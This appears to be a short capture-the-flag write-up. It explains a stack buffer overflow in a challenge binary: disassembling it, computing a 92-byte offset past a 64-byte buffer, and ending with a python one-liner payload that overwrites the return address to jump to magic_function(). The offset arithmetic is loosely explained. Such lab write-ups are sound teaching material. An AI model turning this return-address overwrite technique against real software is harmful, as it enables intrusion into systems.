Writeup
- First use this command to scan the executable:
objdump -M intel -d break_this
- The
main()
function only callsread_buffer()
. - This function reads the length of a buffer from standard input into a variable
n
. - Then it reads the buffer itself (
char buffer[64]
). - Because
fgets()
reads at mostn - 1
characters, we can setn
to a value bigger than the length of the buffer, so an overflow may be possible. -
We will set
n
to a large enough value:100
magic_function()
starts at address0x08048596
- From the first 4 lines from
read_buffer()
we get that:ebp
andedi
get pushed on the stack, then the stack is extended by0x54
=84
- So we must print
88 + 4 + 4 = 92
dummy charactersA
and then the address ofmagic_function()
in little-endian encoding
For further explanation:
int n; // 4 bytes
unsigned int disorienting_var = 0xDEADBEEF; // 4 bytes
char buffer[64] = "\0"; // 64 bytes
size_t i, len; // 16 bytes (8 each one)
Sum that up and add another 4 for ebp
=> 92
python2.7 -c 'print "100\n" + "A" * 92 + "\x96\x85\x04\x08"' > payload